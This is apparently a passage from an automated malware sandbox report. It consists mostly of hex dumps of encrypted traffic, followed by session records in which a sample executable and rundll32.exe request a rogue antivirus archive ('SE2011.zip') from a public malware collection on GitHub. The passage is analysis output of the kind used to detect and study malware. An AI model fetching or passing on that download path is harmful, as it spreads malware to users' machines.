                                                                                                                                                    Data Ascii: dD,~-,!SE;0d@d$S9D--"\Vy#wl^qfK5Ey1m/,+x`8~PDir=q`>6>0S[|?W,W~*?l|,}l>4f3RZd;cOQmWj#sqA_R-x$.1mz`1UZ{Sa,7(?Em)I
                                                                                                                                                    2022-09-29 12:59:22 UTC32314INData Raw: 21 a5 f7 c4 ca bc 9e 9a 1a 6b 7d 68 5a b4 fc 6c 11 cc a2 6d 38 01 0c f0 27 1f eb 52 44 87 5c 8c 18 ea 62 f4 0f cb e8 80 bd 3c bb 35 30 f1 37 21 ce 2e d6 fe 15 3d 78 6a 90 4f f5 de 5a 49 0b 2a f5 80 c8 5d cb 33 b8 3c 74 c1 6f 3c f5 b4 c6 4b 9f e4 c1 dc 1b 17 77 2d bd 7c 31 db 6e ac 15 f6 32 d8 76 fb bd be e3 41 33 2d 14 a8 50 3a 15 b0 e6 8f 4c de 8b 03 a0 8e 4a 3d 83 33 b7 ed 86 f7 ff e3 d4 30 80 ee de 4c 56 f2 1e 5f 5c 12 5d bd a3 d7 ad 1c 6a 0f d5 30 bb 84 8d 1c 18 04 85 16 81 90 3c 74 94 88 83 e8 28 ff 6f af 8b 4e 87 d5 a2 cb fb 67 04 c4 5c f5 7e a1 0f 71 96 bf f3 15 74 45 fe 82 50 59 8c 62 54 64 9e 69 f7 cb 86 ed 82 6e 95 13 70 1f bc 34 21 aa f3 43 3b 49 de 58 98 51 2c 01 9c f7 28 55 09 0a 77 92 4f 14 13 bd 9a c6 56 43 0c 6b 15 ba 6b 6d 3d 43 a0 d5 74
                                                                                                                                                    Data Ascii: !k}hZlm8'RD\b<507!.=xjOZI*]3<to<Kw-|1n2vA3-P:LJ=30LV_\]j0<t(oNg\~qtEPYbTdinp4!C;IXQ,(UwOVCkkm=Ct
                                                                                                                                                    2022-09-29 12:59:22 UTC32330INData Raw: c6 19 9c 3b 40 22 39 c5 1f ea 6a 3b c5 4b 56 11 80 f4 f5 0a aa 45 a0 dd 59 33 9d e9 06 ed 7b d7 25 1a 23 7f 1d ad 96 56 30 7a 67 38 91 b4 9c dd 5b 32 37 26 d8 58 97 26 f1 e8 ba f6 96 43 05 1b 04 58 e7 5d 53 95 45 73 89 ae 36 a9 8e b4 c8 d4 c6 77 af ad 3e 44 ca 61 c2 20 d2 43 8c dc 17 76 74 d6 63 71 b5 81 2b f6 a4 2d 9b d5 3e 44 2c 64 97 86 b8 10 f7 1f 2c 28 5a bb 21 af 0a d0 94 2b 9f 3d b0 ed 61 16 7c 1b 41 24 ce 5a 26 f3 ce e4 e9 2e 57 ea 60 10 af 0c d8 c3 97 73 6d b2 d7 41 28 4f 20 19 99 a0 a1 67 c8 d5 e3 d3 2a 9b 8d 45 e7 82 d8 9a af 94 99 f6 fe 69 48 22 22 0a d4 e2 cf c5 30 a4 21 8e eb c1 36 e1 f0 12 89 2d 2f a9 07 33 d1 5a 0b 65 f7 7d a2 0b c7 74 46 56 bb 90 89 b8 91 13 e3 49 78 d7 d0 62 7a 92 6e 97 13 c0 24 03 e3 88 f2 89 27 2e 16 0d 21 5b 48 4c 3e
                                                                                                                                                    Data Ascii: ;@"9j;KVEY3{%#V0zg8[27&X&CX]SEs6w>Da Cvtcq+->D,d,(Z!+=a|A$Z&.W`smA(O g*EiH""0!6-/3Ze}tFVIxbzn$'.![HL>
                                                                                                                                                    2022-09-29 12:59:22 UTC32346INData Raw: 0f 05 f7 84 8f 3f 8f d8 63 f7 19 87 43 90 06 d4 ce 6f d5 b2 ea 7f d8 13 c7 eb a3 81 35 fd c9 8e e2 f0 97 59 5d 45 74 ca 8b d9 18 a1 33 45 a3 06 c3 cf 87 60 50 70 13 6c 07 67 12 d6 89 71 90 1a 7c f1 63 bc ac 0b a3 78 86 f5 b1 e9 ed 58 59 4e 12 23 1e fb f4 71 de 17 00 76 43 7f 64 eb 23 a6 d2 99 ee d6 d6 6d 5e 67 8f 79 a0 e1 d5 39 e6 4e be 49 23 64 f8 21 60 ef c1 84 35 0b 6c 9c f4 18 92 70 e2 5e 8d ff f2 44 51 c0 48 46 2d 84 29 a4 57 f6 6f 74 55 e9 74 2a d4 16 b0 14 fd c9 14 c7 30 17 13 c1 46 96 82 75 03 4f 32 0b 8d 10 56 6e 2d 8e ba 58 fc 3b a5 0a 74 d9 40 37 e8 a8 ce 5b 5c 9b 59 36 89 ea 05 80 59 f3 e5 a9 35 36 36 0d 80 30 c9 07 ea 05 cd bd 70 f2 a0 65 d9 b0 e2 81 e3 ee d5 42 3d 30 46 ac a1 7e f9 0a 16 c3 09 ff 73 be c3 7a b3 63 47 b7 5d b9 24 6d 35 fc 93
                                                                                                                                                    Data Ascii: ?cCo5Y]Et3E`Pplgq|cxXYN#qvCd#m^gy9NI#d!`5lp^DQHF-)WotUt*0FuO2Vn-X;t@7[\Y6Y5660peB=0F~szcG]$m5
                                                                                                                                                    2022-09-29 12:59:22 UTC32356INData Raw: e3 6d 8b bc 08 3b 1f ae 55 e2 38 5f 6b 07 52 94 2f b6 b4 a8 b7 c9 cb 94 01 5e da 57 a6 ba 93 c5 b3 78 67 16 22 29 42 d9 87 95 10 c4 a5 a4 a5 06 6b eb 09 5f 2d a6 c7 cb fb 87 91 7d f1 d8 2e c4 11 74 93 e8 49 82 63 e8 95 86 b3 9d 0e be 72 56 3e 0f a9 2f 5e 51 a9 45 24 75 3f 26 fd a5 5f 7b ee ab 16 b0 cd c2 af 05 ab 60 5c 9e e2 83 ac f3 8e 0e 53 a1 7e 39 64 b5 01 57 b1 f7 4d 69 40 55 18 65 11 6c 8f 37 28 db 5d 17 bd 87 1d 10 70 54 fb d8 22 7a 4f 7e 3c c1 8c 03 ea ed 21 f3 e4 b4 e6 7e d4 c9 cd ce 6c e6 9c 30 e5 35 6e 7e c9 4e da a0 2c e4 88 b7 1a 3f 4e 81 2b 06 74 30 fb 86 ef e7 f3 73 90 7e 6b 5d 4f 4e 33 d9 0b 4c d0 35 6e 6e 04 4a 4a 76 75 88 49 14 a2 47 09 09 e3 10 e2 e6 4e 0a 6a 9a d5 ee ff 1d 5d a2 38 a5 a3 15 77 0b 5a 62 8b 07 9f fa f1 20 2c a7 ac 1c 28
                                                                                                                                                    Data Ascii: m;U8_kR/^Wxg")Bk_-}.tIcrV>/^QE$u?&_{`\S~9dWMi@Uel7(]pT"zO~<!~l05n~N,?N+t0s~k]ON3L5nnJJvuIGNj]8wZb ,(
                                                                                                                                                    2022-09-29 12:59:22 UTC32372INData Raw: be 1b 68 c0 0c 99 69 ad 3a 70 be 0f 2f 98 e9 d2 b7 7d 3a 85 a0 9d f5 13 62 8f 79 54 20 b4 43 ef e2 c5 d5 77 c4 a5 1d 36 ba 67 71 9a 6c 17 1d cc 1f 27 78 72 0e 10 97 90 81 74 b4 74 bc 42 7e 38 1d e9 ee 18 71 98 74 a2 95 19 a7 57 c4 0a 23 02 20 bc 0b 38 0e e8 aa a7 71 89 34 65 26 3d d0 fd 75 06 79 1d 38 63 3d 9c a0 18 44 cd 01 d1 5e 54 1f 13 5b b6 cc 98 9d f0 27 02 64 a3 a1 02 79 63 e2 40 58 32 be d4 8e 33 c3 d4 55 f9 0d 65 3b 9e 34 8e 74 9f 6b 36 ce 9e 66 ae 0b a9 b5 ac 97 71 46 b8 04 a6 91 f9 ac 71 ce a6 63 78 e5 b9 56 c5 c4 3d 1b d5 9c 87 95 67 60 5c e1 47 8e f5 1a 81 2d 11 26 b8 62 a6 96 2d 70 ea 09 d3 de 9e ab 00 26 72 69 81 5e 68 42 83 25 8a f6 21 9f 08 30 c2 d9 ac 2d d2 9e af f5 5c 18 c6 ff e8 9f 88 0a 94 d2 cd b0 8c 90 d8 5f 4a f5 e7 9f d4 6b 56 e4
                                                                                                                                                    Data Ascii: hi:p/}:byT Cw6gql'xrttB~8qtW# 8q4e&=uy8c=D^T['dyc@X23Ue;4tk6fqFqcxV=g`\G-&b-p&ri^hB%!0-\_JkV
                                                                                                                                                    2022-09-29 12:59:22 UTC32388INData Raw: d3 69 c6 4e 7e ee 71 d8 01 bc d1 3f fa b9 05 4b 9f 40 bb fb 71 da 7a ac f7 e6 d9 67 3b 4d 26 6e a6 c5 fb 4e e4 7a ed f4 06 6b bd ea 65 22 96 80 b0 12 39 43 ea 81 8f fc 26 89 84 d0 f3 e7 a9 74 42 38 0b fc 82 fd 03 d5 82 60 8a 7d 93 46 5f 75 4b 44 da 93 85 8a 15 ca 0b 16 82 6b 2e fa e7 0f a3 90 e6 76 e3 ee 4a d8 89 0b 64 f4 63 62 c6 d3 11 66 15 5d 4a e3 12 8a bf ae ff e3 10 9b 88 bb ed 5b 7a 08 15 95 25 28 ed 8a 43 d1 65 85 07 75 93 28 67 26 05 35 83 0d 32 61 e5 f9 97 58 a7 10 ab 28 3f 02 51 24 ce a5 20 cb a3 28 47 1c b9 12 84 aa a7 99 d1 cc ac a5 32 dd 0a 8d 81 92 57 2e 86 30 f4 f9 af f2 ca 40 69 47 25 f3 52 8c c6 42 b8 6b 68 cc cc 74 0f e0 0e 78 f7 4d 01 a7 6f 2f fa 23 07 06 0b 8c 8f b1 d9 c1 e1 f7 c9 7a 7a 0c 23 f8 49 94 ae 24 77 a1 a9 f8 67 3e cd 5e a8
                                                                                                                                                    Data Ascii: iN~q?K@qzg;M&nNzke"9C&tB8`}F_uKDk.vJdcbf]J[z%(Ceu(g&52aX(?Q$ (G2W.0@iG%RBkhtxMo/#zz#I$wg>^
                                                                                                                                                    2022-09-29 12:59:22 UTC32404INData Raw: c3 14 cf 43 c0 44 e5 fa b8 ae 0f b7 c0 c8 bd df 4d 61 38 42 e7 23 45 1f c4 e1 c8 6a cd e1 65 13 a3 6a b6 4b 71 60 a2 a6 36 7d 6e 9c 57 86 c2 05 16 9c 75 bc c9 be d8 6b 49 94 5f a4 3d 9d e9 a9 dd f9 a5 8f 35 8a 7a a2 2d 3a 70 33 4d 33 b9 cf c1 46 0a 30 9d a8 bb c8 4e ff 53 5c 0f 18 f7 d9 e8 50 78 2f c4 6a 40 bb ff 12 3c 6b 1b 05 bc b2 fe 76 37 3f 6f 71 9e a7 fc 43 e9 2b e7 c9 1b db aa 9a 62 44 19 b3 a9 4c 88 ca 6d ab 04 db 5a a8 a5 c0 dd 9d 80 72 2d 70 19 8d 92 de 52 6f 65 c4 fe 03 d3 5e 77 05 01 a6 16 a0 9a eb c9 ae 88 0c da d7 ff fd b4 ea 8d c7 ac a9 d8 ad 12 37 29 fd 2c 74 ea 73 a6 f4 41 fc 23 bd 98 51 cc 6c a2 32 8e 08 fd c7 3a a1 bc d7 26 5f 91 be db ca 8b 3d d7 9e 99 1c 54 27 67 2a fe a6 f9 f1 76 b0 71 0b d9 ae cd ce cb 84 7f 80 d9 c6 dd aa dc b8 be
                                                                                                                                                    Data Ascii: CDMa8B#EjejKq`6}nWukI_=5z-:p3M3F0NS\Px/j@<kv7?oqC+bDLmZr-pRoe^w7),tsA#Ql2:&_=T'g*vq
                                                                                                                                                    2022-09-29 12:59:22 UTC32420INData Raw: d7 fb c5 04 e4 2a f4 46 23 99 6a 22 f1 ad 4f 5d 25 c0 f2 ac f7 bc 84 81 8a ed 03 11 27 b8 26 de 30 32 f2 46 83 ab da 88 df 6e 17 0b 34 78 02 5b b8 a6 50 d3 72 6e d5 d3 73 f4 ed 54 77 ef 67 79 50 27 be 01 08 66 b4 3c e0 38 0b 18 f7 4d b5 67 cf 0b a7 7f e8 37 88 01 b2 ea b9 d1 3a fe 9f 8e 5c 72 af dc f0 08 0d 33 e9 2d aa da 21 3d f2 95 99 c5 db 50 f7 48 ad 34 36 6b 9f 6f 53 96 83 cb 42 db a6 ea 40 5c 5a 1a 05 af 6b 1a 8e fe 22 80 af 51 10 93 c1 6b 33 1b 43 5d d5 11 f8 33 2e f5 d0 dc 63 9c 33 17 51 74 dc ec 0a b7 14 13 cc 87 c8 e6 1c 67 eb e0 f9 e6 5a 8e 7b 3d d6 c8 60 18 9a 16 43 e6 31 7f b7 43 5b f1 c4 b4 f0 f5 fb 8d d3 e6 a7 31 b8 66 b9 85 1e 28 bd f5 e5 46 e3 e5 5b 36 2d ec ee f9 b7 d8 03 2a bd ef c9 fb a9 e5 60 0e ef 3c 44 5c 7c 4e 7d 1f a9 a6 d4 10 5d
                                                                                                                                                    Data Ascii: *F#j"O]%'&02Fn4x[PrnsTwgyP'f<8Mg7:\r3-!=PH46koSB@\Zk"Qk3C]3.c3QtgZ{=`C1C[1f(F[6-*`<D\|N}]
                                                                                                                                                    2022-09-29 12:59:22 UTC32436INData Raw: 85 52 93 19 d1 b6 c3 8e b6 29 44 9e 8b 6c 2e ee 96 d2 3b 70 84 18 1b ef 28 58 8e da 36 d8 29 7e 5d 3e 62 69 29 81 4a 50 e8 79 a9 46 c0 b1 f7 a6 39 79 95 24 ba 2d 18 56 ea 87 cf 63 a3 83 f3 10 2b 5e 24 d1 3b 88 23 3c d7 89 7b 70 3f 2d 43 65 95 77 64 1f fc 8a 6f f5 5f 71 e0 2f 8e a0 3b ec 72 eb be 1d 76 75 2c 37 cc 8e 5f 88 62 c4 2f 48 3b a1 92 ec 6f 51 65 c9 88 6e 32 5c 3d 8b a2 ab c4 64 6e d9 fc 9b 99 1f 8e b2 06 41 86 74 45 d6 01 fa eb 60 45 a4 11 e2 6c 78 af 40 3c 31 49 f1 5e c3 71 d0 1e 7e 4c 5d 69 02 67 c6 76 9b b0 cb 0c 41 31 05 28 ce 63 12 be 61 2a 4f be 4a 1e 62 e9 ef c2 a1 2f 0a 7c 4c f0 a9 fb cb ee 96 63 bf d3 e9 c1 7d 97 6b 13 13 08 35 7e 03 0d e6 b2 5b f9 46 20 95 ff f1 ca e7 ea e3 e7 b6 c2 f0 50 73 06 6d c2 32 7e 90 96 74 b9 38 4c 82 87 7f 17
                                                                                                                                                    Data Ascii: R)Dl.;p(X6)~]>bi)JPyF9y$-Vc+^$;#<{p?-Cewdo_q/;rvu,7_b/H;oQen2\=dnAtE`Elx@<1I^q~L]igvA1(ca*OJb/|Lc}k5~[F Psm2~t8L
                                                                                                                                                    2022-09-29 12:59:22 UTC32452INData Raw: 95 cf 80 98 ae 08 01 8a 66 b8 d6 5c de df 7e 22 72 78 73 71 42 c7 9d d2 7c 4a 14 77 c2 e6 01 7d 85 6c 5b 9a e4 7b d6 7b 69 43 cb 5e 8f f3 eb 67 0f b7 f2 67 b8 73 23 a2 4e 8b 52 42 39 7c 04 7c 2a 7d d5 fd 58 c1 c2 d7 83 b5 a2 10 b0 0b 70 e8 d7 3d e1 2c 3d 55 e0 8c 44 80 97 2d aa 9f b2 50 4d 8f 38 0f 25 ae 0c 87 60 38 13 fe 70 a7 7e 97 88 b8 f9 58 2f 82 00 bf f0 70 60 c7 0b 00 90 95 96 d3 c4 eb 7f 24 b2 b5 1f 01 8e a9 92 37 df dd 48 cd f3 2b 1f 92 b3 2f 9d 97 57 80 3a 2e 95 4c 31 ab 54 eb 17 6c 3d 8a f1 49 36 87 3d b7 ee 1d d8 53 ae 90 2e 44 6a fd cb 76 3d 98 d3 e0 cf b5 a6 3d f4 57 99 5f 9d a5 24 4a 74 fb 23 96 b4 2c 0b db a5 c2 7c 97 69 22 2c 9b ba 25 dd 18 6d 1a 4c 85 03 28 5e 8e ce 40 7f 0e da f6 7d ea 13 97 d2 30 51 60 ee 69 e3 94 9a 63 81 ec 5b de c5
                                                                                                                                                    Data Ascii: f\~"rxsqB|Jw}l[{{iC^ggs#NRB9||*}Xp=,=UD-PM8%`8p~X/p`$7H+/W:.L1Tl=I6=S.Djv==W_$Jt#,|i",%mL(^@}0Q`ic[
                                                                                                                                                    2022-09-29 12:59:22 UTC32468INData Raw: e9 eb c7 ef 41 56 8e 88 aa ec d0 ff 9a f1 79 f7 cf d2 81 d8 69 7a 2e 40 a1 a5 41 5e 71 6d 65 24 4e 55 64 fe 20 a7 8f f6 c2 4e a5 d7 45 65 84 9b f1 02 47 98 d1 3b 7f e3 69 a9 4e 8a 94 f1 ad cf 3a 67 4e c4 6c dd f7 1c f0 b9 70 e2 9a 76 d6 e1 cd 70 8b 34 72 79 7c b9 0d 90 3d c8 9d 7b 73 44 90 33 65 d5 d8 31 85 d6 fa 5b a6 00 dc 82 9d f3 c4 8c cf a4 7a 92 75 ac 1e fa b4 6f 50 20 4e ef 29 38 d2 68 85 bf fb 90 85 4e 71 a8 a9 aa 68 be 65 40 6a 54 b1 86 07 d9 88 d3 74 17 dd 12 21 69 61 60 6c 66 81 9e 95 33 ae 85 c0 dd b2 f4 2d 81 3b bb 11 db 99 03 9d 02 11 7b 42 7f d2 2d 0f 71 02 57 ea 44 bb 6b 14 5e 33 7d c9 dd 3f 25 27 f2 fc 19 22 d4 d4 5e 6f e2 f9 46 15 55 25 d3 96 b6 44 62 8e e5 9e 94 46 b4 45 64 8d 6f 70 23 97 ec 63 18 6d 4f bb 5b ed 0e 16 92 04 fd 13 27 1f
                                                                                                                                                    Data Ascii: AVyiz.@A^qme$NUd NEeG;iN:gNlpvp4ry|={sD3e1[zuoP N)8hNqhe@jTt!ia`lf3-;{B-qWDk^3}?%'"^oFU%DbFEdop#cmO['
                                                                                                                                                    2022-09-29 12:59:22 UTC32484INData Raw: 67 65 f3 7d f2 8e a0 2d c1 68 49 8c 80 ff 86 02 4b 7e e6 6e 23 6f 26 9a b4 2c c1 76 2f 95 12 69 9f 95 57 bf f1 80 09 76 c7 d7 d6 1d 0c dc b4 49 39 af ef 79 1e ef d5 f2 ff 06 9b 32 e6 e4 cd 9c 55 0f 4b 18 6b b8 19 eb 86 5c d0 1c f0 ff 78 ed 1e b3 ef 52 1b cf c1 14 f1 85 93 3a c5 9a 52 c9 3d 9d a5 f3 96 23 8b 4e ba cc 01 39 72 b9 04 74 a1 c1 40 e5 8a 8b 6d af 3a b9 db ab 96 18 02 88 c4 95 44 77 bc 9c 05 e1 cb 46 72 7d cc 68 17 69 c2 9b b9 83 31 66 d3 a7 0d 6c b2 03 76 d6 d4 03 db e6 51 34 6b 56 f9 c5 0c 31 d8 59 9e 39 aa 87 25 4f 3c 13 c4 cf 0d c7 26 db f9 35 7e d5 64 2a 08 50 d2 03 72 a6 29 bb 97 f5 9d 48 1d b2 f1 6e 87 79 17 f6 6e f8 77 f0 97 36 14 5e 1d 6d db f3 99 95 b8 62 d2 5e db 42 8f 24 95 ee 2d e7 10 f4 72 1d 3e 75 01 80 12 41 76 ad 7b 40 83 4b c0
                                                                                                                                                    Data Ascii: ge}-hIK~n#o&,v/iWvI9y2UKk\xR:R=#N9rt@m:DwFr}hi1flvQ4kV1Y9%O<&5~d*Pr)Hnynw6^mb^B$-r>uAv{@K
                                                                                                                                                    2022-09-29 12:59:22 UTC32500INData Raw: 01 9c 42 3b 74 c7 34 9d e1 ca ac e8 61 ed 93 8d 16 3f cc b3 05 36 50 94 46 f8 1f 57 b7 2b 30 85 2f d7 93 3d 57 94 7b dd 50 5c 47 8c 01 42 18 dc 0c 9b bc fb ff 5a 98 5e 3f 61 e5 24 e5 31 a3 7e b5 72 10 ea 13 d8 e3 a4 4d 6b 8b a3 b2 0d 0a f3 99 5d 0b 16 ca 7c 22 ce 74 2c bb 59 b3 40 fd ea 29 42 b4 6c 30 bc e3 a5 e0 e0 6a 65 e4 32 ad fc 45 45 65 6a ff b4 b7 fe c6 44 0e d5 23 82 e0 26 b4 8a e5 54 b3 9e 89 34 2a 2d 34 bf 89 96 28 9f 3a 7e f6 57 1f c4 f0 16 47 30 69 a3 b5 d1 76 00 f0 23 c7 0d c8 de 86 c3 ac ca 30 a7 72 08 16 eb cb 84 bc 31 4c 7e ea a4 3d b4 b3 35 6d 7e aa 67 44 83 d6 27 56 39 3c 29 0b 5b 02 30 6d 35 52 82 fe 70 b4 e7 dd 41 2c 25 3d 17 65 b5 f8 a5 89 47 eb 38 7f 9a 7f 72 d8 3c cc 2d 92 52 a6 a0 09 77 5f be 13 05 ae fb 04 26 54 65 dc cb ed 3d 2c
                                                                                                                                                    Data Ascii: B;t4a?6PFW+0/=W{P\GBZ^?a$1~rMk]|"t,Y@)Bl0je2EEejD#&T4*-4(:~WG0iv#0r1L~=5m~gD'V9<)[0m5RpA,%=eG8r<-Rw_&Te=,
                                                                                                                                                    2022-09-29 12:59:22 UTC32516INData Raw: 09 38 90 37 48 7f 76 69 b3 50 bd 04 2c 64 94 ca 7a 80 17 aa 5b ad 46 03 60 ec 0b 04 12 5e ef e0 98 9b 6c f6 a5 15 1e b7 a8 4b a0 d8 11 6a dc 7e 4b 27 de a4 7c 05 80 e6 d0 bb 82 97 48 fe e2 a6 35 9c 08 01 e3 a3 53 96 3b 1e c3 7d eb 34 67 f3 b7 20 e3 86 95 65 e1 87 01 5a 0b 6b ec 3c 7f b3 a7 ba 5a d9 64 61 48 f9 5d ac 2d 1b 18 ae 1a b7 a5 5b c8 8f c9 0e fc 57 97 7b 01 4a c9 3f 92 39 4d e2 4c 65 ed 6d c7 d2 48 99 4f 44 19 d9 64 a7 94 ee fb e2 42 69 b4 63 86 b5 b5 20 71 4c 25 0e 45 7b b9 9c 83 76 c8 0c c0 3d c0 ea 40 9e f2 00 93 14 8b 4d 43 ff c3 e3 11 44 4d 5b bc 08 52 78 8f ed 81 05 79 32 4f b0 7f 9a 1e c9 7a 44 bc 20 66 d6 83 b7 84 3a 3c dc fb 34 52 31 37 fd 2a 86 ff 6d 6a bb fe 45 b0 20 fa db 48 a5 90 f9 94 a7 fc ef 91 56 96 ce 29 fa a4 d8 ff 2a d1 ed fe
                                                                                                                                                    Data Ascii: 87HviP,dz[F`^lKj~K'|H5S;}4g eZk<ZdaH]-[W{J?9MLemHODdBic qL%E{v=@MCDM[Rxy2OzD f:<4R17*mjE HV)*
                                                                                                                                                    2022-09-29 12:59:22 UTC32532INData Raw: f6 ab 0a 7b 31 c4 d3 5c 9d d3 5a b5 91 70 f1 db 37 33 13 d5 f3 e5 13 7f 21 32 59 ac c2 42 a1 69 94 31 97 24 e5 a8 73 af eb d7 1a f5 bc 2e 65 34 29 58 9f 44 2f a7 9e 90 91 7d 34 2f cd ea f1 ff b5 e2 f5 02 c7 58 c8 85 e6 0b f6 d5 25 03 a2 bd e5 3c eb 95 67 ef 1b cd 2f 96 54 b1 25 7a a5 47 07 eb 63 d7 c5 ed f0 86 6e 80 97 46 dc 98 0f f5 b9 7e c6 21 88 00 89 00 2c dd 33 0a a2 1b 14 58 1d b8 db 9e aa f1 39 b2 b7 3b 4e af 93 ec 6f d4 a5 5e 7c c0 43 9c 59 89 27 4a 51 e6 7a bc e1 4d 0d 47 49 95 11 7b 81 d9 81 cf f5 75 45 7d 5c 58 87 1d de 77 db 1f 7c ec d3 dc 78 18 ce 2f d4 a8 77 e6 4f f5 3f 92 4b a5 0a cd 7f 84 46 9f aa 06 4d 3a 66 3b 37 6e 58 91 07 9f fb 51 91 47 60 0d 59 24 1a dc ea d6 d3 47 ca 96 d6 e9 16 43 67 49 12 0f 1c f2 f4 60 ab ac f1 be 31 b1 79 68 14
                                                                                                                                                    Data Ascii: {1\Zp73!2YBi1$s.e4)XD/}4/X%<g/T%zGcnF~!,3X9;No^|CY'JQzMGI{uE}\Xw|x/wO?KFM:f;7nXQG`Y$GCgI`1yh
                                                                                                                                                    2022-09-29 12:59:22 UTC32548INData Raw: 27 16 c6 3a 22 11 ed 85 21 37 f5 4d 14 bf 4e eb 50 5a d4 e0 1a 11 8d a0 12 d2 8e 45 1e df 71 75 db ac 6f 3f 7f d6 e9 18 8e 3e 12 34 fa 14 a0 95 89 62 9d b0 c8 b1 81 f5 5f 77 0e 67 e4 ff 2d 9b 30 1b d0 ec d2 23 d1 6a 83 58 23 55 3b 31 6a 89 55 7a 20 22 d7 f8 9a 06 90 e1 b7 40 e7 2b 5e dd 76 4d 16 ee c8 c0 f2 fb 2f 4d 22 e9 30 89 e9 41 13 36 cb 3c ef bf 9a be ac 40 41 33 e1 f8 17 1c c0 e6 ec 1b c6 53 a6 5c 8c f9 8c ec 53 aa d2 19 12 d0 4e 3e 78 e8 44 c8 b3 33 57 a5 3d b8 94 73 9b f1 10 6a 9e d6 4c d9 72 3a d3 ea 6c 9d 4b 42 64 2c 65 ec 1b 2a 9d be 6d 12 46 2e f3 48 f2 4d c6 0e a3 d8 d6 4d 80 6c 32 53 9a fb 0c ed 3d 28 22 db e6 6b ca 98 9d 65 6d c3 3d 23 19 d1 38 cc 7c be d5 d2 aa 45 2f a6 58 c7 2b 38 9e ec d1 94 ee ca e0 96 7c a3 84 49 ee e1 90 02 88 e2 71
                                                                                                                                                    Data Ascii: ':"!7MNPZEquo?>4b_wg-0#jX#U;1jUz "@+^vM/M"0A6<@A3S\SN>xD3W=sjLr:lKBd,e*mF.HMMl2S=("kem=#8|E/X+8|Iq
                                                                                                                                                    2022-09-29 12:59:22 UTC32564INData Raw: 3c 18 52 09 6f 03 24 c5 73 59 05 19 d3 1a d8 e1 bf 75 17 7f 9f 47 33 a5 73 41 23 68 ea c0 0c 11 d9 c9 74 1e 68 90 44 b2 23 ff c6 97 83 54 9b 68 6c ae a8 a1 67 cf 45 00 36 67 36 cc ad 69 ef 24 45 cc 64 31 03 d5 37 55 75 2e ff da 5e af 17 78 8b 34 f7 f7 5a a6 2b 18 7e 0b 2d 1e 40 11 3a 3f 7e bd 3d 6d 14 36 47 f2 8c 73 1a 51 a0 63 9e a4 45 6e dc 59 f5 ae db 5c f0 09 e8 75 64 21 39 7a 63 96 bc 38 cf f8 be 02 a5 6f e4 0b 44 a7 e9 9b 50 87 79 f5 8b ea 38 7a d2 6a f7 6c 4b 31 ee 34 25 56 80 51 31 12 ed ba 94 c7 d8 d3 dd 13 92 91 b5 30 46 5d 42 6e 89 96 c6 fd 7e 99 c2 c0 02 58 a1 a6 5c 7d 6e 4a b7 3e ad 5a 10 c6 40 0a 24 aa 95 d3 b7 ec 49 62 49 39 b5 96 71 88 d9 7b 73 ef 22 d5 dd 4a cf 72 dc e5 b1 98 e9 97 81 8b dc 7c 07 47 82 74 b3 14 16 31 ae 96 0e 28 61 ce 9c
                                                                                                                                                    Data Ascii: <Ro$sYuG3sA#hthD#ThlgE6g6i$Ed17Uu.^x4Z+~-@:?~=m6GsQcEnY\ud!9zc8oDPy8zjlK14%VQ10F]Bn~X\}nJ>Z@$IbI9q{s"Jr|Gt1(a


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    125192.168.2.349770140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:23 UTC32566OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    126140.82.121.3443192.168.2.349770C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:23 UTC32566INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:27 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SE2011.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:23 UTC32566INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    127192.168.2.349771185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
